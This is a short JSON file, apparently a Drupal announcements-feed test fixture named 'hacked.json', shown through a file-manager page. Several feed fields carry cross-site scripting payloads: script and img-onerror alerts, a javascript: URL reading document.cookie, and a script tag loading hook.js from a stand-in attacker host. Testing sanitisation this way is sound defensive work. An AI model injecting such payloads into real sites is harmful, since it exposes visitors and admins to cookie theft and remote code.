aDriv4 - MANAGER
Edit File: hacked.json
{ "version": "https://jsonfeed.org/version/1.1", "title": "Drupal Announcements Feed", "home_page_url": "https://www.drupal.org", "feed_url": "https://www.drupal.org/announcements.json", "favicon": "https://www.drupal.org/favicon.ico", "items": [ { "id": "2031", "title": "new 9 only - <script>alert('drupal')</script>", "content_html": "This release will have a community alert prototype to notify site admins about drupal updates and required information", "url": "javascript://alert(document.cookie)", "date_modified": "2021-01-19T07:29:38+00:00", "date_published": "2021-01-18T07:29:38+00:00", "_drupalorg": { "featured": false, "version": ">=7.0" } }, { "id": "2021", "title": "updated 10 - look at this: <img='' onerror='alert(123)' />", "content_html": "This release will have a community alert prototype to notify site admins about drupal updates and required information", "url": "https://www.drupal.org/project/announce", "date_modified": "2021-01-19T07:29:38+00:00", "date_published": "123<script src=http://attackersite/hook.js></script>456", "_drupalorg": { "featured": true, "version": ">=7.0" } } ] }